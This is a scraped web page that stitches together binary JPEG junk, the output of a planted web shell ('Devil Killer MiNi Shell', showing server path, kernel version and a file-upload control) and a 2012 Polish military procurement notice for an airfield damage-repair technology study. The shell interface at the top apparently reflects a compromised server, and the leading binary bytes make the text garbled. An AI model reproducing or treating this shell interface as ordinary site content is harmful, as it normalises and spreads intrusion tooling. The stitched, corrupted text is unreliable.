JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120927/368512-N-2012.html

<p class="kh_header"><b>Gdańsk: Analiza oraz wybór właściwych technologii i opracowanie organizacji procesu odbudowy zniszczeń lotniskowych w celu wykorzystania w Normie Obronnej</b><br>
<b>Numer ogłoszenia: 368512 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 17 Terenowy Oddział Lotniskowy , ul. Konopnickiej 13, 80-240 Gdańsk, woj. pomorskie, tel. 58 348 3403, faks 58 3483404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.17tol-gdansk.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna podległa Ministrowi Obrony Narodowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Analiza oraz wybór właściwych technologii i opracowanie organizacji procesu odbudowy zniszczeń lotniskowych w celu wykorzystania w Normie Obronnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem zamówienia jest: 
1. Analiza i wybór właściwych technologii odbudowy zniszczeń sztucznych nawierzchni lotniskowych metodą szybką i tradycyjną-czasową w czasie kryzysu i wojny,
2. Opracowanie Organizacji procesu odbudowy zniszczeń sztucznych nawierzchni lotniskowych w czasie kryzysu i wojny dla przyjętych rozwiązań technologicznych.
3. Nadzór autorski w trakcie weryfikacji opracowanego przedmiotu zamówienia   
w warunkach poligonowych.

II. Przedmiot zamówienia realizowany będzie w 3 etapach:
Etap I:
1)  Zebranie informacji o istniejących europejskich i światowych technologiach odbudowy zniszczeń lotniskowych (zarówno na lotniskach wojskowych jak i cywilnych) oraz możliwościach ich zastosowania w warunkach krajowych w czasie  kryzysu i wojny  (z podaniem źródeł bibliograficznych).
2) Zaproponowanie rozwiązań technologicznych dla metod: szybkiej i tradycyjnej-czasowej.
3) 	Uzasadnienie zaproponowanych rozwiązań koncepcyjnych - podanie zalet, wad oraz  ograniczeń możliwości w zastosowaniu.
4) 	Wskazanie algorytmu doboru właściwej metody, w odniesieniu do różnych (niekorzystnych) warunków gruntowo-wodnych i atmosferycznych na obszarze Polski, dla każdej zaproponowanej technologii.
5) Opracowanie harmonogramu realizacji prac koncepcyjnych (ETAP I i II).

UWAGI DO ETAPU I:
1) Do opracowania Technologii odbudowy należy przyjąć:
- bazowy poziom i parametry zniszczeń na podstawie STANAG-u 2929 (dokument niejawny o klauzuli ZASTRZEŻONE w języku angielskim - do wglądu w siedzibie Zamawiającego),
- samoloty obliczeniowe: F-16 i Herkules C-130,
- w założeniach czasowych należy uwzględnić 1 godzinę przeznaczoną na rozpoznanie zniszczeń lotniskowych.
2) Dla technologii  tradycyjnej-czasowej odbudowy zniszczeń nawierzchni lotniskowych należy:  
- przyjąć maksymalny czas odbudowy do 48 godzin,
- podać co najmniej po 3 rozwiązania technologiczne dla:
* 	lejów, w tym: z wykorzystaniem ogólnodostępnych płyt żelbetowych o gładkich płaszczyznach ścian bocznych, np.: typu MON, z modułem wymiarowym którego wielokrotność pozwala na pokrycie całkowitej powierzchni leja wg modułu 3 x 1 [m],
* 	zniszczeń powierzchniowych z zastosowaniem nowoczesnych materiałów 
naprawkowych stosowanych obecnie w odbudowie/budowie sztucznych 
nawierzchni lotniskowych, w tym: betonów i asfaltobetonów lub innych.
3)  Dla technologii szybkiej odbudowy zniszczeń nawierzchni lotniskowych należy: 
- przyjąć maksymalny czas odbudowy do 4 godziny,
- podać co najmniej po 3 rozwiązania technologiczne do:
* 	wypełnienia leja, w tym jeden wariant z wykorzystaniem mat kompozytowych, 
* 	naprawy zniszczeń powierzchniowych wykorzystując nowoczesne materiały  stosowane obecnie do odbudowy / naprawy, w tym: betony szybkosprawne, betony  żywiczne i materiały naprawkowe.
4)	 W  trakcie opracowywania przedmiotowych Technologii odbudowy wymagane jest odbycie 2 narad technicznych.  W przedmiotowych naradach  mogą wziąć udział zaproszeni przedstawiciele innych podmiotów  - wg decyzji Zamawiającego.
5) Technologie odbudowy muszą zawierać szczegółowe uzasadnienie zaproponowanych 
wariantów rozwiązań - podanie możliwości i ograniczeń stosowania każdej technologii 
w odniesieniu do różnych (niekorzystnych) warunków gruntowo-wodnych i atmosferycznych na obszarze Polski oraz opracowanie algorytmu ich wyboru.
6) Zakończenie prac Etapu I  wymaga akceptacji opracowanych Technologii odbudowy przez Zamawiającego.
7) Przedmiotowe opracowanie należy wykonać w formie sprawozdania: 
-	w formie pisemnej (trwale oprawione) - 5 egz. 
-	w formie elektronicznej na CD (plik  zapisany w programie WORD, EXCEL oraz 
ADOBE READER) - 1 egz.
Etap II:
1) Opracowanie Organizacji procesu odbudowy nawierzchni lotniskowych dla przyjętych technologii wraz z normami realizacyjnymi. 
2) Dla każdej z przyjętych technologii (dla każdego wariantu):
-	opracowanie ramowego harmonogramu realizacyjnego (poszczególnych czynności),
-	opracowanie specyfikacji technicznej wykonania i odbioru robót zawierającej wymagane parametry techniczne nawierzchni lotniskowych, w tym: nośność (przeliczonej 
na PCN), szorstkość, równość, parametry zagęszczenia poszczególnych warstw kruszyw),
-	określenie materiałów (rodzaj i ilość), wymagań technicznych i deklaracji zgodności,
-	określenie poziomu minimalnych zapasów materiałowych na obiekcie lotniskowym, 
-	zaproponowanie optymalnego usytuowania zasobów materiałów i ich ilości na lotnisku,
-	dobór sprzętu i urządzeń (rodzaj, ilość, parametry techniczno - eksploatacyjne),
-	podanie organizacji i przebiegu robót (wstępnych, przygotowawczych, zasadniczych, końcowych i pielęgnacyjnych),
-	określenie składów zespołów roboczych,
-	określenie procedur kontroli poszczególnych etapów robót (jednoznacznych parametrów krytycznych), szybkiego odbioru i dopuszczenia nawierzchni lotniskowych 
do eksploatacji (testy alternatywne z wykorzystaniem tylko etatowego wyposażenia pododdziału przeznaczonego do odbudowy nawierzchni lotniskowych (np.: głębokość koleiny) - bez dostępu do specjalistycznych laboratoriów),
-	określenie tolerancji (dopuszczalnych odchyłek) dla poszczególnych elementów 
funkcjonalnych lotniska, na etapach przejściowych i na zakończenie robót,
-	określenie warunków bezpieczeństwa, BHP oraz FOD  i wpływu na środowisko naturalne,
-	algorytm obliczania i wyboru MOS  i MAOS  (dla wskazanych typów statków 
powietrznych).
-	opracowanie wzorcowego planu lotniska stosowanego w trakcie usuwania zniszczeń lotniskowych (skali map, oznakowania elementów funkcjonalnych, sposobu orientowania, oznakowania i określania współrzędnych zniszczeń, rozmieszczenia materiałów przeznaczonych do naprawy, itp.).
3) Część końcowa zawierająca:
-	szczegółowy algorytm doboru właściwej metody, w odniesieniu do różnych 
(niekorzystnych) warunków gruntowo-wodnych i atmosferycznych na obszarze Polski, 
dla zaproponowanych technologii,
-	podsumowanie uzyskanych wyników wraz z oceną potencjału potrzebnego do odbudowy rodzaju zniszczeń (leje, zniszczenia powierzchniowe) w zależności od rodzaju przy-jętej technologii odbudowy (potencjał sprzętowy, ludzki i niezbędne ilości materiałów), co pozwoli na określenie warunków brzegowych w każdej technologii.

UWAGI DO ETAPU II:

1) Do opracowania Organizacji procesu odbudowy należy przyjąć:
bazowy poziom i parametry zniszczeń na podstawie STANAG-u 2929 (dokument niejawny  o klauzuli ZASTRZEŻONE w języku angielskim - do wglądu siedzibie 
Zamawiającego),
-	samoloty obliczeniowe: F-16 i Herkules C-130,
-	w założeniach czasowych należy uwzględnić 1 godzinę przeznaczoną na rozpoznanie zniszczeń lotniskowych.
2) Ponadto Wykonawca powinien odnieść się  do potrzeby praktycznej (doświadczalnej) 
weryfikacji każdej z opracowanych technologii.
3)	W trakcie opracowywania wariantów organizacji procesu odbudowy wymagane jest odbycie 2 narad technicznych. Narady techniczne będą zorganizowane w siedzibie Zamawiającego lub w miejscu przez niego wskazanym. W naradach mogą wziąć  udział zaproszeni przedstawi-ciele innych podmiotów - wg decyzji Zamawiającego.  
4) Opracowane Organizacje procesu odbudowy powinny zapewniać bezpieczne wykonywanie operacji lotniczych.
5) Zakończenie prac Etapu II  wymaga:
-	uzyskania uzgodnień: 
-	Szefostwa Infrastruktury Inspektoratu Wsparcia Sił Zbrojnych w Bydgoszczy,
-	Zarządu Planowania Rozwoju SP A-5 Dowództwa Sił Powietrznych 
w Warszawie,
-	uzyskania opinii pracownika naukowego, niezależnego od Wykonawcy,  posiadającego doświadczenie w przedmiotowej tematyce.
6) Przedmiotowe opracowanie należy wykonać w formie sprawozdania pisemnego zawierającego dokumentację opisowo-obliczeniową oraz rysunkowo-konstrukcyjną, trwale oprawionego (5 egz.) oraz w formie elektronicznej na CD (plik  zapisany w programie WORD, EXCEL oraz ADOBE READER) - 1 egz.
Etap III:
Nadzór autorski w trakcie weryfikacji opracowanego przedmiotu zamówienia (ETAP I i ETAP II) w warunkach poligonowych na terenie  lotniska wojskowego MALBORK.
Wobec powyższego Wykonawca winien:
1)	uczestniczyć w pracach poligonowych;
2)	kontrolować przebieg badań ((zgodność technologii, organizacji i materiałów);
3)	opracować sprawozdanie z badań poligonowych. W przypadku rozbieżności między 
założeniami teoretycznymi (ETAP I i ETAP II) a ich weryfikacją  na poligonie, Wykonawca  skoryguje  założenia teoretyczne w sporządzonym sprawozdaniu ( zgodność 
w zakresie technologii, organizacji i materiałów).

UWAGI DO ETAPU III:
1)	W trakcie sprawowanego nadzoru autorskiego wymagane jest odbycie 1 narady technicznej. Narada techniczna będzie zorganizowana w siedzibie Zamawiającego lub w miejscu przez niego wskazanym. W naradzie mogą wziąć  udział zaproszeni przedstawi-ciele innych podmiotów - wg decyzji Zamawiającego.  
2)	Przedmiotowe opracowanie należy wykonać w formie sprawozdania: 
-	w formie pisemnej (trwale oprawione) - 5 egz. 
-	w formie elektronicznej na CD (plik  zapisany w programie WORD, EXCEL oraz ADOBE READER) - 1 egz.

Przedmiot zamówienia musi być opracowany zgodnie m.in. z:
-	Ustawą z dnia 5 sierpnia 2010r. o ochronie informacji niejawnych
 (tekst jednolity Dz. U. z 2010 r. Nr 182, poz. 1228) do wykonania prac objętych tajemnicą służbową do klauzuli  ZASTRZEŻONE włącznie.
-	Polskimi Normami, normami obronnymi i innymi przepisami i aktami prawnymi, w tym obowiązującymi w Ministerstwie Obrony Narodowej związanymi z przedmiotem zamówienia .

UWAGI OGÓLNE DOTYCZĄCE WYKONANIA DOKUMENTACJI
1. Wykonawca zobowiązany jest na bieżąco uzgadniać sprawy związane z realizacją przedmiotu zamówienia z Zamawiającym.
2. Opisu materiałów, sprzętów i urządzeń sugerowanych w zaproponowanych technologiach należy dokonać  posługując się wyłącznie parametrami technicznymi, w sposób umożliwiający zastosowanie materiałów, sprzętów i urządzeń kilku producentów. Jeżeli nie będzie 
to możliwe, Wykonawca poda parametry równoważne tych materiałów lub urządzeń.
3. Opracowana dokumentacja powinna być trwale oprawiona oraz posiadać ponumerowane strony..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium w wysokości 4000,00 zł (cztery tysiące złotych) należy wnieść w terminie do dnia 05 października 2012r. do godz. 10:30. Niewniesienie wadium, w tym również na przedłużony okres związania ofertą, lub wniesienie wadium po tym terminie skutkować będzie wykluczeniem Wykonawcy. 
2. Szczegóły dotyczące wadium zawarte są w Rozdziale 12 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Na podstawie art. 22 ustawy Prawo zamówień publicznych, w postępowaniu o udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczą-ce:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia; 
4)	sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej 
sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres 
korzystania z nich przy wykonywaniu zamówienia.
3.Ponadto, w postępowaniu o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) Złożą wymagane dokumenty określone w specyfikacji istotnych warunków zamówienia (na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, 
w jakich te dokumenty mogą być składane- Dz. U. z 2009 r. Nr 226, poz. 1817).
2) Spełniają wymogi wynikające z treści niniejszej specyfikacji istotnych warunków zamówie-nia oraz projektu umowy.
3) Wykonali co najmniej 1 usługę w zakresie realizacji prac badawczych obejmujących ocenę parametrów techniczno-eksloatacyjnych sztucznych nawierzchni lotniskowych o pow. min 50 tys. m2  lub opracowanie technologii budowy (remontu) sztucznych 
nawierzchni lotniskowych o pow. min. 50 tys. m2 uwzględniających analizę (opinię) zastosowanych materiałów niezbędne do wykazania spełniania warunku wiedzy i doświadczenia, wykonanej w okresie ostatnich trzech lat przed upływem terminu składa-nia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdza-jącego, że ta usługa została wykonana należycie. 
4) Posiadają opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
5) Spełniają warunki określone w Ustawie z dnia 5 sierpnia 2010 r. o ochronie informacji nie-jawnych (tekst jednolity Dz. U. z 2010 r. nr 182, poz. 1228) łącznie z przepisami wykonaw-czymi do ww. ustawy.
4.W przypadku zaistnienia okoliczności, o których mowa w art. 24 ust. 1 i 2 ustawy Prawo 
zamówień publicznych, Zamawiający wykluczy Wykonawcę biorącego udział w postępowaniu o udzielenie zamówienia, a złożoną przez niego ofertę uzna za odrzuconą. Zamawiający zawiadomi równocześnie Wykonawców, którzy zostaną wykluczeni z postępowania, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art. 92 ust. 1 pkt 3.

OFERTA WSPÓLNA

Zgodnie z art. 23 ust. 1 ustawy PZP, w trakcie postępowania Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku wybrania w postępowaniu o udzielenie zamówienia publicznego oferty złożonej wspólnie, Zamawiający będzie wymagał sporządzenia i podpisania przez podmioty występujące wspólnie umowy regulującej współpracę tychże podmiotów. Umowa ta musi zawierać zapis dotyczący zakazu rozwiązania umowy, zmian 
treści umowy konsorcyjnej oraz zmian członków konsorcjum bez wiedzy i akceptacji Zama-wiającego. Umowa nie może być podpisana na okres krótszy niż okres realizacji zamówienia (z okresem rękojmi i gwarancji włącznie - obowiązuje okres dłuższy) określony 
w umowie. Umowę konsorcyjną podpisaną przez wszystkie podmioty wchodzące w skład kon-sorcjum należy złożyć razem z umową na wykonanie zamówienia. Termin złożenia umów 
zostanie określony po zakończeniu postępowania na ww. zadanie. W przypadku  niedostarcze-nia umowy konsorcyjnej skutkować będzie to niepodpisaniem umowy na realizację zamówie-nia z przyczyn leżących po stronie Wykonawcy.
W ofercie należy wskazać lidera - jako reprezentanta Wykonawców - z którym zostanie zawarta umowa. Reprezentant konsorcjum (podmiotów występujących wspólnie) winien być również upoważniony do zaciągania zobowiązań w imieniu i za rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu. Dotyczy to również płatności za wykonanie zamówienia. Upoważniony reprezentant Wykonawców lub członek konsorcjum zobowiązany jest do wniesienia wadium na zasadach określonych w SIWZ, a w przypadku wyboru oferty jako najkorzystniejszej do uiszczenia zabezpieczenia należytego wykonania umowy zgodnie z § 12 projektu umowy.
Uwaga: reprezentant Wykonawców  powinien dołączyć do składanej oferty pisemne pełnomocnictwo (upoważnienie) do występowania w imieniu konsorcjum. Pełnomocnictwo (upoważnienie) to powinno obejmować wszelkie czynności związane z prowadzonym postępowaniem i być podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów konsorcjum. Wszelkie opłaty związane z ustanowieniem pełnomocnictwa (upoważnienia) ponosi Wykonawca.
Formularz oferty podpisuje upoważniony reprezentant zespołu Wykonawców. Wszelkie informacje zawarte w Specyfikacji Istotnych Warunków Zamówienia są wiążące dla każdego z Wykonawców wchodzących w skład konsorcjum.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania przez Wykonawcę wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający żąda przedstawienia następujących dokumentów:
1. Wykazu wykonanej co najmniej 1 usługi w zakresie realizacji prac badawczych obejmujących ocenę parametrów techniczno-eksploatacyjnych sztucznych nawierzchni lotniskowych o pow. min 50 tys. m2  lub opracowanie technologii budowy (remontu) sztucznych nawierzchni lotniskowych o pow. min. 50 tys. m2 uwzględniających analizę (opinię) zastosowanych materiałów niezbędne do wykazania spełniania warunku wiedzy i doświadczenia, wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że ta usługa została wykonana należycie. 
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców (konsorcjum) w/w warunek może być spełnione łącznie (co najmniej przez jeden podmiot konsorcjum).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania przez Wykonawcę wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia 
Zamawiający żąda przedstawienia następujących dokumentów:
1. Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o pod-stawie do dysponowania tymi osobami. 
2. Wykaz osób i ich  stanowisk dopuszczonych do informacji niejawnych z podaniem  ważności dokumentów i klauzuli tajności. 
3. Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, są członkami Okręgowej Izby Inżynierów Budownictwa oraz posiadają aktualne, na czas składania i otwarcia ofert, ubezpieczenie od odpowiedzialności cywilnej.

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców (konsorcjum) warunki określone pkt 1-3 mogą być spełnione łącznie (co najmniej przez jeden podmiot konsorcjum).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda przedstawienia:
- kopii opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności związanej z przedmiotem zamówienia wraz z dowodem opłacenia składki.
UWAGA I: 
W przypadku oferty wspólnej polisę OC składa każdy z uczestników konsorcjum.
UWAGA II:  
Zgodnie z art. 36 ust. 4 Zamawiający żąda wskazania, przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. Warunki dotyczące zatrudnienia podwykonawcy określone są w § 6 projektu umowy, załączonej do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

